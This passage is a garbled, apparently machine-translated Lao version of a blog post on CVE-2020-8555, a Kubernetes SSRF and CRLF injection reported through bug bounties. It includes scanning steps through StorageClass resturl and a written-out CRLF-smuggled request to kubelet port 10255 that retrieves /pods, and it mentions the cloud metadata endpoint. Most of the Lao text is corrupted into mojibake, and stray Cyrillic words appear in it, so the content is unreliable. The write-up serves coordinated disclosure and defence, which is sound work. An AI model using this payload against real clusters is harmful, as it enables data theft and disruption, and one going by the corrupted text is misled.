เบเบงเบฒเบกเบชเบฒเบกเบฒเบเบเบญเบเบเปเบญเบเปเบซเบงเปเบเบตเปเบเบปเบเปเบซเบฑเบเปเบเปเบงเบฅเบฒเบเบฑเปเบเปเบกเปเบเบเปเบฒเบเบฑเบเปเบเบทเปเบญเบเบเบฒเบเบเบธเบเบเบฑเปเบเบเปเปเปเบเบเบตเป:
- เบเปเปเบชเบฒเบกเบฒเบเปเบชเปเบชเปเบงเบเบซเบปเบง HTTP เปเบเบปเปเบฒเปเบเบเบฒเบเบฎเปเบญเบเบเปเบเบตเปเบญเบญเบเบกเบฒ.
- เบเบงเบฒเบกเบเปเปเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเบเบฒเบเบฎเปเบญเบเบเป POST เบเบตเปเบกเบตเบเบฒเบฅเบฒเบกเบดเปเบเบตเบขเบนเปเปเบเบฎเปเบฒเบเบเบฒเบ (เบญเบฑเบเบเบตเปเปเบกเปเบเบชเบฐเบเบงเบเปเบเบเบฒเบเบฎเปเบญเบเบเปเบเปเบฒเบเบตเปเบชเปเบฒเบเบฑเบเบเบฒเบเบเบปเบงเบขเปเบฒเบ etcd เบเบตเปเปเบฎเบฑเบเบงเบฝเบเบขเบนเปเปเบ. 2379 เบเบญเบเบเปเบฒเบเปเปเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบ HTTP เบเบทเบเปเบเป).
- เบเปเปเบชเบฒเบกเบฒเบเบเบถเบเบเปเปเบกเบนเบเปเบเบทเปเบญเปเบเบเบฒเบเบเบญเบเบชเบฐเปเบญเบเปเบกเบทเปเบญเบฅเบฐเบซเบฑเบเบชเบฐเบเบฒเบเบฐเปเบกเปเบ 200 เปเบฅเบฐเบเบฒเบเบเบญเบเบชเบฐเปเบญเบเบเปเปเบกเบต JSON Content-Type.
เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฑเปเบเบชเบนเบ #2: เบชเบฐเปเบเบเปเบเบทเบญเบเปเบฒเบเบเปเบญเบเบเบดเปเบ
เบงเบดเบเบตเบเบฒเบ SSRF เปเบเบดเปเบเบเบฒเบเบญเบเบเบตเปเปเบเปเบเบทเบเปเบเปเปเบเบทเปเบญเบชเบฐเปเบเบเปเบเบทเบญเบเปเบฒเบเบเบฒเบเปเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบเปเบฅเบฐเบเบฒเบเบชเปเบฒเบซเบผเบงเบเบเบฒเบเบเปเบฅเบดเบเบฒเบเบเบฑเบเบเปเบฒเบเป (เบเบปเบงเบขเปเบฒเบ Metadata, Kubelet, เปเบฅเบฐเบญเบทเปเบเป) เปเบเบเบญเบตเบเปเบชเปเบเปเบฒเบเบญเบ. เบเบปเบงเบเบงเบเบเบธเบก kube.
เบเปเบฒเบญเบดเบ, เบเบญเบเบเบฑเบเบกเบฒเบเบเบฐเบเบฒเบเบเบญเบเบญเบปเบเบเบฐเบเบญเบ Kubernetes เปเบเปเบเบทเบเบเปเบฒเบเบปเบ (8443, 10250, 10251, เปเบฅเบฐเบญเบทเปเบเป), เปเบฅเบฐเบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเบงเบเปเบฎเบปเบฒเบเปเบญเบเบญเบฑเบเบเบฐเปเบเบกเบฑเบเบเบฐเบเบงเบเบเบฒเบเบชเบฐเปเบเบ.
เปเบซเบฑเบเบงเปเบฒเบงเบดเบเบตเบเบฒเบเบชเบฐเปเบเบเบเบฑเบเบเบฐเบเบฒเบเบญเบเบเบตเปเปเบกเปเบเบชเบฐเปเบเบฒเบฐเบซเบผเบฒเบเปเบฅเบฐเบเปเปเปเบซเบกเบฒเบฐเบชเบปเบกเบเบฑเบเปเบเบทเปเบญเบเบชเบฐเปเบเบเบเบฅเบฒเบชเบชเบดเบเปเบฅเบฐเปเบเบทเปเบญเบเบกเบท SSRF, เบเบงเบเปเบฎเบปเบฒเปเบเปเบเบฑเบเบชเบดเบเปเบเบชเปเบฒเบเบเบฐเบเบฑเบเบเบฒเบเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบญเบเปเบ bash script เบเบตเปเบญเบฑเบเบเบฐเปเบเบกเบฑเบเบเบฐเบเบงเบเบเบฒเบเบเบฑเบเบซเบกเบปเบ.
เบเบปเบงเบขเปเบฒเบ, เปเบเบทเปเบญเบชเบฐเปเบเบเบเบญเบเปเบเบ 172.16.0.0/12 เบเบญเบเปเบเบทเบญเบเปเบฒเบเบเบฒเบเปเบเบขเปเบฒเบเปเบงเบงเบฒ, เบเบฐเบเบฑเบเบเบฒเบ 15 เบเบปเบเปเบเปเบเบทเบเปเบเบตเบเบเบปเบงเปเบเบเบฐเบซเบเบฒเบ. เบเปเบงเบ IP เบเปเบฒเบเปเบเบดเบเบเบตเปเปเบเปเบเบทเบเปเบฅเบทเบญเบเปเบเบฑเบเบเบปเบงเบขเปเบฒเบเปเบเบปเปเบฒเบเบฑเปเบ เปเบฅเบฐเบญเบฒเบเบเบฐเบกเบตเบเบฒเบเบเปเบฝเบเปเบเบเบเปเปเบเบฑเบเบเปเบงเบ IP เบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบชเบฐเปเบเบฒเบฐเบเบญเบเบเปเบฒเบ.
เปเบเบทเปเบญเบชเบฐเปเบเบเบซเบเบถเปเบเบเบตเปเบขเบนเป IP เปเบฅเบฐเบซเบเบถเปเบเบเบญเบ, เบเปเบฒเบเบเปเบฒเปเบเบฑเบเบเปเบญเบเปเบฎเบฑเบเบเบฑเปเบเบเปเปเปเบเบเบตเป:
- เบฅเบถเบ StorageClass เบเบตเปเบเบงเบเบชเบญเบเบซเบผเปเบฒเบชเบธเบ;
- เปเบญเบปเบฒเบเบฒเบเบญเปเบฒเบเบชเบดเบเบเบฐเบฅเบดเบกเบฒเบเบเบปเบเบเบตเปเบเบตเปเบขเบทเบเบขเบฑเบเบเปเบฒเบเบกเบฒ;
- เบเปเบฝเบเบเปเบฒ IP เปเบฅเบฐ Port เปเบ
sc.yaml
; - เบชเปเบฒเบ StorageClass เบเบตเปเบกเบต IP เปเบฅเบฐเบเบญเบเปเบซเบกเป;
- เบชเปเบฒเบ PVC เปเบซเบกเป;
- เบชเบฐเบเบฑเบเบเบปเบเปเบเปเบฎเบฑเบเบเบฒเบเบชเบฐเปเบเบเปเบเบเปเบเปเบเปเบฒเบญเบฐเบเบดเบเบฒเบเบชเปเบฒเบฅเบฑเบ PVC.
เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฑเปเบเบชเบนเบ #3: เบเบฒเบเบชเบตเบ CRLF + เบเบฒเบเบฅเบฑเบเบฅเบญเบ HTTP เปเบ "เปเบเบปเปเบฒ" เบเบญเบเบเบธเปเบก Kubernetes
เบเปเบฒเบเบญเบเปเปเบทเบญเปเบเบเบฒเบเบเบตเป เบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเปเบเปเบชเบฐเปเปเบตเปเบซเปเบฅเบนเบเบเปเบฒเบฅเบธเปเบเปเบเบปเปเบฒเบเบญเบเบเบธเปเบก K8s ะธ เปเบซเปเบเบงเบเปเบเบปเบฒเปเบเบปเปเบฒเปเบเบดเบเบเบฑเบเบเบถเบเบเบญเบ kube-controller-manager, เบเบปเบเบเบฐเบเบปเบเปเบเปเบเบฒเบเปเบเบฑเบเบเบงเบฒเบกเบชเปเบฒเบเบฑเบเบซเบผเบฒเบเบเบถเปเบ.
เบกเบฑเบเบชเบฐเบเบงเบเบเบงเปเบฒเบซเบผเบฒเบเบชเปเบฒเบฅเบฑเบเบเบนเปเปเบเบกเบเบตเบเบตเปเบเบฐเบเปเบฝเบเบเปเบฒเบฎเปเบญเบเบเป HTTP เบเบตเปเบเบทเบเบญเบญเบเปเบเบเบกเบฒเปเบเบทเปเบญเปเบซเปเปเบเปเบเปเบฒเบเบญเบ HTTP เบขเปเบฒเบเปเบเบฑเบกเบเบตเปเบเบฒเบกเบเบฒเบเบเบฑเบเบชเบดเบเปเบเบเบญเบเบฅเบฒเบง.
เปเบเบทเปเบญเบเบฐเบเบดเบเบฑเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบชเบธเบเบเปเบฒเบ, เบเปเบญเบเบกเบตเปเบเบทเปเบญเบเปเบเบเบฑเปเบเบเปเปเปเบเบเบตเป:
- เบเบนเปเปเบเปเบเปเบญเบเบกเบตเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบเบฑเบเบเบถเบ kube-controller-manager (เปเบเบฑเปเบ: เปเบ Azure LogInsights).
- เบเบธเปเบก Kubernetes เบเบฐเบเปเบญเบเปเบเป Golang เปเบงเบตเบเบฑเบเบเบตเปเบเปเปเบฒเบเบงเปเบฒ 1.12.
เบเบงเบเปเบฎเบปเบฒเปเบเปเบเบณเปเบเปเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเปเบญเบเบเบดเปเบเบเบตเปเบเบณเบฅเบญเบเบเบฒเบเบชเบทเปเบชเบฒเบเบฅเบฐเบซเบงเปเบฒเบเบฅเบนเบเบเปเบฒ GlusterFS Go เปเบฅเบฐเปเบเบตเบเปเบงเบตเปเบเบปเปเบฒเปเบฒเบเบเบญเบก (เบเบงเบเปเบฎเบปเบฒเบเบฐเบซเบผเบตเบเบฅเปเบฝเบเบเบฒเบเปเบเบตเบเปเบเป PoC เปเบเบเบญเบเบเบตเป).
เปเบเปโเบเบปเบโเปเบซเบฑเบ
เปเบเบเบเบฒเบเบฅเบงเบกเปเบญเบปเบฒ SSRF เปเบเบดเปเบเบเบฒเบเบญเบเบเบตเปเปเบเปเบญเบฐเบเบดเบเบฒเบเบเปเบฒเบเปเบเบดเบ ะฒะผะตััะต เบเปเบงเบเบชเบดเปเบเบเบตเป, เบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเปเบซเปเบเบฑเบเบเบงเบฒเบกเบกเบฑเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ, เบฅเบงเบกเบเบฑเบเบเบฒเบเบเปเบฝเบเบชเปเบงเบเบซเบปเบง, เบงเบดเบเบตเบเบฒเบ HTTP, เบเบฒเบฅเบฒเบกเบดเปเบเบตเปเบฅเบฐเบเปเปเบกเบนเบ, เปเบเบดเปเบ kube-controller-manager เบเบธเบเปเบเปเบเบซเบผเบฑเบเบเบฒเบเบเบฑเปเบ.
เบเบตเปเปเบกเปเบเบเบปเบงเบขเปเบฒเบเบเบญเบ "bait" เบเบตเปเปเบฎเบฑเบเบงเบฝเบเบขเบนเปเปเบเบเบปเบงเบเปเบฒเบเบปเบเบเบฒเบ resturl
StorageClass, เปเบเบดเปเบเบเบฐเบเบดเบเบฑเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฒเบเปเบเบกเบเบตเบเบตเปเบเปเบฒเบเบเบทเบเบฑเบ:
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn
เบเบปเบเปเบเปเบฎเบฑเบเปเบกเปเบเบเบงเบฒเบกเบเบดเบเบเบฒเบ เบเบฒเบโเบเบญเบโเบชเบฐโเบซเบเบญเบโเบเบตเปโเบเปเปโเบเปเบญเบโเบเบฒเบโ, เบเปเปเบเบงเบฒเบกเบเบตเปเบเบฑเบเบเบถเบเปเบงเปเปเบเบเบฑเบเบเบถเบเบเบญเบเบเบปเบงเบเบงเบเบเบธเบก. เบเปเบเบญเบเปเบเบเบฑเบ verbosity เปเบเบตเบเปเบเปเปเบเบเบเปเบฒเปเบฅเบตเปเบกเบเบปเปเบ, เปเบเบทเปเบญเปเบเบเบญเบเบเปเปเบเบงเบฒเบกเบเบญเบเบชเบฐเบซเบเบญเบ HTTP เบเบฑเบเบเบทเบเบเบฑเบเบเบถเบเปเบงเปเบขเบนเปเบเบตเปเบเบฑเปเบ.
เบเบตเปเปเบกเปเบ "bait" เบเบตเปเบกเบตเบเบฐเบชเบดเบเบเบดเบเบฒเบเบเบตเปเบชเบธเบเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบเบเบญเบเบเบญเบเบซเบผเบฑเบเบเบฒเบเบชเบฐเปเบเบเปเบเบงเบเบงเบฒเบกเบเบดเบ.
เบเบฒเบเบเปเบฒเปเบเปเบงเบดเบเบตเบเบฒเบเบเบตเป, เบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเบเบฒเบเปเบเบกเบเบตเบเปเปเปเบเบเบตเปเบเบฒเบเบเบธเปเบกเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบ k8s เบเบตเปเบกเบตเบเบฒเบเบเบฑเบเบเบฒเบเบเปเบฒเบเป: เบเบฒเบเบเบฐเบซเบเบฒเบเบชเบดเบเบเบดเบเบดเปเบชเบเบเบฑเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเปเบฝเบงเบเบฑเบ metadata, Master DoS เบเปเบฒเบ (unencrypted) HTTP requests on etcd master instances, เปเบฅเบฐเบญเบทเปเบเป.
เบเบปเบเบเบฐเบเบปเบ
เปเบเบเปเบฒเบเบฐเปเบซเบผเบเบเบตเปเปเบเบฑเบเบเบฒเบเบเบฒเบ Kubernetes เบเปเบฝเบงเบเบฑเบเบเบธเบเบญเปเบญเบเบเบญเบ SSRF เบเบตเปเบเบงเบเปเบฎเบปเบฒเบเบปเปเบเบเบปเบ, เบกเบฑเบเบเบทเบเบเบฑเบเบญเบฑเบเบเบฑเบ CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. เบเปเบฒเบเบงเบเปเบฎเบปเบฒเบเบดเบเบฒเบฅเบฐเบเบฒเบเบฝเบเปเบเปเบเบงเบฒเบกเบญเปเบญเบเปเบญเบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบญเบเปเบเบ Kubernetes, vector เบเบงเบฒเบกเบชเบปเบกเบเบนเบ (เบเบงเบฒเบกเบชเบปเบกเบเบนเบ vector) เบกเบฑเบโเบกเบตโเบเบธเบโเบชเบปเบกโเบเบฑเบโเปเบเบฑเบโ เบเปเปเบกเบต.
เบขเปเบฒเบเปเบเบเปเปเบเบฒเบก, เบเบฒเบเบเบฐเปเบกเบตเบเบเบปเบเบชเบฐเบเปเบญเบเบเบตเปเปเบเบฑเบเปเบเปเบเปเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบฒเบเบเปเบฅเบดเบเบฒเบเบเบตเปเบกเบตเบเบฒเบเบเบธเปเบกเบเบญเบ (เปเบฅเบฐเบเบตเปเปเบกเปเบเบชเปเบงเบเบเบตเปเบซเบเปเบฒเบชเบปเบเปเบเบเบตเปเบชเบธเบเบเบญเบเบเบฒเบเบเบปเปเบเบเบงเปเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒ!) เปเบเปเบเบฐเบเบธเปเบเปเบซเปเบเบงเบเปเบฎเบปเบฒเบเบฑเบเบเบฐเปเบเบเบเบงเบฒเบกเบญเปเบญเบเปเบญเปเบซเบกเปเปเบเบปเปเบฒเปเบเปเบเบเบฒเบเบเบฑเบเบญเบฑเบเบเบฑเบ. CVSS10/10 เบชเบณเบเบฑเบ เบชเปเบฒเบฅเบฑเบเบเบนเปเบเบฑเบเบเปเบฒเบซเบเปเบฒเบเบเปเบฒเบเบงเบเบซเบผเบฒเบ.
เบเปเบฒเบเบฅเบธเปเบกเบเบตเปเปเบกเปเบเบเปเปเบกเบนเบเปเบเบตเปเบกเปเบเบตเบกเปเบเบทเปเบญเบเปเบงเบเปเบซเปเบเปเบฒเบเปเบเบปเปเบฒเปเบเบเบฒเบเบเบดเบเบฒเบฅเบฐเบเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบกเบทเปเบญเบเบฐเปเบกเบตเบเบเบปเบเบเบฐเบเบปเบเบเบตเปเบญเบฒเบเปเบเบตเบเบเบถเปเบเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบฅเบฒเบง:
เบเบงเบฒเบกเบเบทเปเบชเบฑเบ
- เบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบเบฒเบเปเบฅเบเบฐเปเบเปเบเบเปเบเปเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเบฒเบเปเบเบเบตเปเปเบเปเบกเบฒ.
- เบเบฒเบเบเบฐเบฅเบดเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบเปเบฒเบเปเบเบดเบเบเบตเปเปเบเบเปเบเปเบงเบดเบเบตเบเบฒเบ IDOR (Insecure Direct Object Reference) เบเบฑเบเบเบฑเบเบเบฐเบเบฒเบเบญเบเบญเบทเปเบเปเบเบตเปเบเบปเบเปเบซเบฑเบเบขเบนเปเปเบเปเบเบทเบญเบเปเบฒเบเบเปเบญเบเบเบดเปเบ.
เบเบงเบฒเบกเบฅเบฑเบ
- เบเบฐเปเบเบเบเบฒเบเปเบเบกเบเบต
เบเบฒเบเปเบเบทเปเบญเบเปเบซเบงเบเปเบฒเบเบเบปเบงเบเบญเบเปเบ เบเปเบเบญเบเปเบเบเบฑเบเบเบฒเบเบฅเบฑเบเบเปเปเบกเบนเบเบเบญเบเบเบฅเบฒเบง (เบเบปเบงเบขเปเบฒเบ, metadata API). - เบเบฒเบเบฅเบงเบเบฅเบงเบกเบเปเปเบกเบนเบเปเบเบเบเบฒเบเบชเบฐเปเบเบเปเบเบทเบญเบเปเบฒเบเบเปเบญเบเบเบดเปเบ (เบเบฒเบเบเปเบฒเบเบปเบเบชเบฐเบเบฑเบ SSH, HTTP server version, ... ).
- เปเบเบฑเบเบเบณเบเปเปเบกเบนเบเบเบปเบงเบขเปเบฒเบ เปเบฅเบฐเปเบเบเบชเปเบฒเบเบเบทเปเบเบเบฒเบเปเบเบเบเบฒเบเบชเบณเบซเบผเบงเบ API เบเบฒเบเปเบเปเบเบฑเปเบ metadata API (
http://169.254.169.254
, ... ). - เบเบฒเบเบฅเบฑเบเบเปเปเบกเบนเบเบฅเบนเบเบเปเบฒเปเบเบเปเบเปเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเบญเบเบเบฅเบฒเบง.
Availability
เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบธเบเบเบปเปเบเบเบฑเบเปเบปเบเบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบฒเบเปเบเบกเบเบต vectors on เบเบงเบฒเบกเบเบทเปเบชเบฑเบ, เบชเบฒเบกเบฒเบเบเบทเบเบเปเบฒเปเบเปเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฐเบเปเบฒเบเบตเปเบเปเบฒเบฅเบฒเบเปเบฅเบฐเบเปเบฒเปเบเบชเบนเปเบเบปเบงเบขเปเบฒเบเบเบปเปเบเบชเบฐเบเบฑเบเบเบฒเบ perimeter เบฅเบนเบเบเปเบฒ (เบซเบผเบทเบญเบทเปเบเป) เปเบกเปเบเบเปเปเบชเบฒเบกเบฒเบเปเบเปเปเบเป.
เปเบเบทเปเบญเบเบเบฒเบเบเบงเบเปเบฎเบปเบฒเบขเบนเปเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบก K8s เบเบตเปเบเบทเบเบเบธเปเบกเบเบญเบเปเบฅเบฐเบเบฒเบเบเบฐเปเบกเบตเบเบเบปเบเบเบฐเบเบปเบเบเปเปเบเบงเบฒเบกเบเบทเปเบชเบฑเบ, เบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเบเบดเบเบเบฐเบเบฒเบเบฒเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบเปเบฒเบเบงเบเบซเบผเบฒเบเบเบตเปเบชเบฒเบกเบฒเบเบชเบปเปเบเบเบปเบเบเบฐเบเบปเบเบเปเปเบเบฒเบเบกเบตเบขเบนเป. เบเบปเบงเบขเปเบฒเบเปเบเบตเปเบกเปเบเบตเบกเบฅเบงเบกเปเบเบดเบเบเบฒเบเบเปเบฒเบฅเบฒเบเบเบฒเบเบเปเปเบกเบนเบ etcd เบซเบผเบทเบเบฒเบเปเบเบซเบฒเบเบตเปเบชเปเบฒเบเบฑเบเบเบฑเบ Kubernetes API.
เบเบณ เบเบปเบเปเบงเบฅเบฒ
- เบงเบฑเบเบเบต 6 เบเบฑเบเบงเบฒ 2019: เบฅเบฒเบเบเบฒเบเบเบธเบเบญเปเบญเบเบเปเปเบเบฑเบ MSRC Bug Bounty.
- เบงเบฑเบเบเบต 3 เบกเบฑเบเบเบญเบ 2020: เบเบฒเบเบชเปเบงเบเบเบตเบชเบฒเบกเปเบเปเบเปเบซเปเบเบนเปเบเบฑเบเบเบฐเบเบฒ Kubernetes เบฎเบนเปเบงเปเบฒเบเบงเบเปเบฎเบปเบฒเบเบณเบฅเบฑเบเปเบเปเปเบเบเบฑเบเบซเบฒเบเบงเบฒเบกเบเบญเบเปเบเบขเบนเป. เปเบฅเบฐเบเปเปเบซเปเบเบงเบเปเบเบปเบฒเบเบดเบเบฒเบฅเบฐเบเบฒ SSRF เปเบเบฑเบเบเบธเบเบญเปเบญเบเบเบฒเบเปเบ (เปเบเบซเบผเบฑเบ). เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเบงเบเปเบฎเบปเบฒเปเบเปเบชเบฐเบซเบเบญเบเบเบปเบเบฅเบฒเบเบเบฒเบเบเบปเปเบงเปเบเบเบตเปเบกเบตเบฅเบฒเบเบฅเบฐเบญเบฝเบเบเปเบฒเบเบงเบดเบเบฒเบเบฒเบเบเปเบฝเบงเบเบฑเบเปเบซเบผเปเบเบเบญเบเบเบฑเบเบซเบฒ.
- เบงเบฑเบเบเบต 15 เบกเบฑเบเบเบญเบ 2020: เบเบงเบเปเบฎเบปเบฒเปเบเปเบชเบฐเปเบญเบเบเบปเบเบฅเบฒเบเบเบฒเบเบเบฒเบเบงเบดเบเบฒเบเบฒเบ เปเบฅเบฐเบเบปเปเบงเปเบเปเบซเปเบเบฑเบเบเบนเปเบเบฑเบเบเบฐเบเบฒ Kubernetes เบเบฒเบกเบเบฒเบเบฎเปเบญเบเบเปเบเบญเบเปเบเบปเบฒเปเบเบปเปเบฒ (เบเปเบฒเบเปเบงเบเบต HackerOne).
- เบงเบฑเบเบเบต 15 เบกเบฑเบเบเบญเบ 2020: เบเบนเปเบเบฑเบเบเบฐเบเบฒ Kubernetes เปเบเปเบเปเบซเปเบเบงเบเปเบฎเบปเบฒเบฎเบนเปเบงเปเบฒเบเบฒเบเบชเบตเบ SSRF + CRLF เปเบเบดเปเบเบเบฒเบเบญเบเบชเบณเบฅเบฑเบเบเบฒเบเบญเบญเบเบฅเบธเปเบเบเบตเปเบเปเบฒเบเบกเบฒเบเบทเบงเปเบฒเปเบเบฑเบเบเบธเบเบญเปเบญเบเปเบเบซเบผเบฑเบ. เบเบงเบเปเบฎเบปเบฒเบขเบธเบเปเบเบปเบฒเบเบฒเบเบงเบดเปเบเบฒเบฐเบเบญเบเปเบเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบญเบทเปเบเปเปเบเบเบฑเบเบเบต: เบเบตเบกเบเบฒเบ K8s เบเปเบฒเบฅเบฑเบเบเบฑเบเบเบฒเบเบเบฑเบเบชเบฒเปเบซเบเบเบญเบเบฎเบฒเบ.
- เบงเบฑเบเบเบต 15 เบกเบฑเบเบเบญเบ 2020: เบฅเบฒเบเบงเบฑเบ MSRC เปเบเปเบฎเบฑเบเบเปเบฒเบ HackerOne.
- เบงเบฑเบเบเบต 16 เบกเบฑเบเบเบญเบ 2020: Kubernetes PSC (เบเบฐเบเบฐเบเปเบฒเบกเบฐเบเบฒเบเบเบงเบฒเบกเบเบญเบเปเบเบเบญเบเบเบฐเบฅเบดเบเบเบฐเบเบฑเบ) เปเบเปเบฎเบฑเบเบฎเบนเปเบเปเบญเบเปเบซเบงเปเบเบฑเปเบเบเปเบฒเบง เปเบฅเบฐเบเปเปเบซเปเบฎเบฑเบเบชเบฒเบกเบฑเบเปเบงเปเปเบเบฑเบเบเบงเบฒเบกเบฅเบฑเบเบเบปเบเบฎเบญเบเบเบฒเบเปเบเบทเบญเบเบกเบตเบเบฒ เปเบเบทเปเบญเบเบเบฒเบเบเบนเปเปเบเบฒเบฐเบฎเปเบฒเบเบเบตเปเบญเบฒเบเบเบฐเปเบเบตเบเบเบถเปเบเปเบเบฑเบเบเปเบฒเบเบงเบเบซเบผเบงเบเบซเบผเบฒเบ.
- เบงเบฑเบเบเบต 11 เบเบธเบกเบเบฒ 2020: เปเบเปเบฎเบฑเบเบฅเบฒเบเบงเบฑเบ Google VRP.
- เบงเบฑเบเบเบต 4 เบกเบตเบเบฒ 2020: เบฅเบฒเบเบงเบฑเบ Kubernetes เปเบเปเบฎเบฑเบเบเปเบฒเบ HackerOne.
- เบงเบฑเบเบเบต 15 เบกเบตเบเบฒ 2020: เปเบเบทเปเบญเบเบเบปเปเบเปเบเปเปเบฅเบทเปเบญเบเบเบฒเบเปเบเบตเบเปเบเบตเบเบเปเปเบชเบฒเบเบฒเบฅเบฐเบเบฐ เปเบเบทเปเบญเบเบเบฒเบเบชเบฐเบเบฒเบเบฐเบเบฒเบ COVID-19.
- เบงเบฑเบเบเบต 1 เบกเบดเบเบธเบเบฒ 2020: Kubernetes + Microsoft เบเบฐเปเบซเบผเบเบเบฒเบเบฎเปเบงเบกเบเปเบฝเบงเบเบฑเบเบเปเบญเบเปเบซเบงเป.
TL; DR
- เบเบงเบเปเบฎเบปเบฒเบเบทเปเบกเปเบเบเปเบฅเบฐเบเบดเบ pizza :)
- เบเบงเบเปเบฎเบปเบฒเปเบเปเบเบปเปเบเบเบปเบเบเปเบญเบเปเบซเบงเปเบซเบผเบฑเบเปเบ Kubernetes, เปเบเบดเบเปเบกเปเบเบงเปเบฒเบเบงเบเปเบฎเบปเบฒเบเปเปเปเบเปเบเบฑเปเบเปเบเบเบตเปเบเบฐเปเบฎเบฑเบเปเบเบงเบเบฑเปเบ.
- เบเบงเบเปเบฎเบปเบฒเปเบเปเปเบฎเบฑเบเบเบฒเบเบงเบดเปเบเบฒเบฐเปเบเบตเปเบกเปเบเบตเบกเบเปเบฝเบงเบเบฑเบเบเบธเปเบกเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบเบเบตเปเปเบเบเบเปเบฒเบเบเบฑเบ เปเบฅเบฐเบชเบฒเบกเบฒเบเปเบเบตเปเบกเบเบงเบฒเบกเปเบชเบเบซเบฒเบเบเบตเปเปเบเบตเบเบเบฒเบเบเบงเบฒเบกเบญเปเบญเบเปเบญเบเบตเปเบเบฐเปเบเปเบฎเบฑเบเปเบเบเบฑเบเบเบตเปเปเปเบฒเบซเบงเบฒเบเบชเบฝเบงเปเบเบตเปเบกเปเบเบตเบก.
- เปเบเบปเปเบฒเบเบฐเบเบปเบเปเบซเบฑเบเบซเบผเบฒเบเบฅเบฒเบเบฅเบฐเบญเบฝเบเบเปเบฒเบเบงเบดเบเบฒเบเบฒเบเปเบเบเบปเบเบเบงเบฒเบกเบเบตเป. เบเบงเบเปเบฎเบปเบฒเบเบดเบเบเบตเบเบตเปเบเบฐเบชเบปเบเบเบฐเบเบฒเบเบฑเบเปเบเบปเปเบฒ (Twitter:
@ReeverZax &@__hach_ ). - เบกเบฑเบโเปเบเปโเบซเบฑเบโเบญเบญเบโเบงเปเบฒโเบเบฐโเปเบเบโเบเบญเบโเบเบฒเบโเปเบเบฑเบโเบเบฒเบโเบเบฒเบโเบเบฑเบโเบซเบกเบปเบโเปเบฅเบฐโเบเบฒเบโเบฅเบฒเบโเบเบฒเบโเปเบเปโเปเบเปโเปเบงโเบฅเบฒโเบซเบผเบฒเบโเบโเปโเบงเบฒโเบเบฒเบโเบซเบงเบฑเบโ.
เปเบญเบเบฐเบชเบฒเบ
-
เบเบธเปเบก Google kubernetes-security-announce ; -
CVE-2020-8555 ; -
เบเบฑเบโเบซเบฒ golang #30794 ; -
heketi/client/api/go-client/volume.go .
PS เบเบฒเบเบเบฑเบเปเบ
เบญเปเบฒเบเบเบฑเบเบขเบนเปเปเบ blog เบเบญเบเบเบงเบเปเบฎเบปเบฒ:
- ยซ
เบเบฒเบเบฅเปเบฒเบชเบฑเบ Kubernetes เปเบเบตเบเบขเปเบฒเบเปเบเบฑเบเบเบฒเบเบเบฒเบเปเบฅเปเบง " - ยซ
เบญเบญเบเบเบฒเบเบเบญเบเปเบ Kubernetes เปเบเบเบเบฒเบเบเบดเบเบเบฑเปเบเบเบฑเบเบเบถเบ " - ยซ
33+ เปเบเบทเปเบญเบเบกเบทเบเบงเบฒเบกเบเบญเบเปเบ Kubernetes ".
เปเบซเบผเปเบเบเปเปเบกเบนเบ: www.habr.com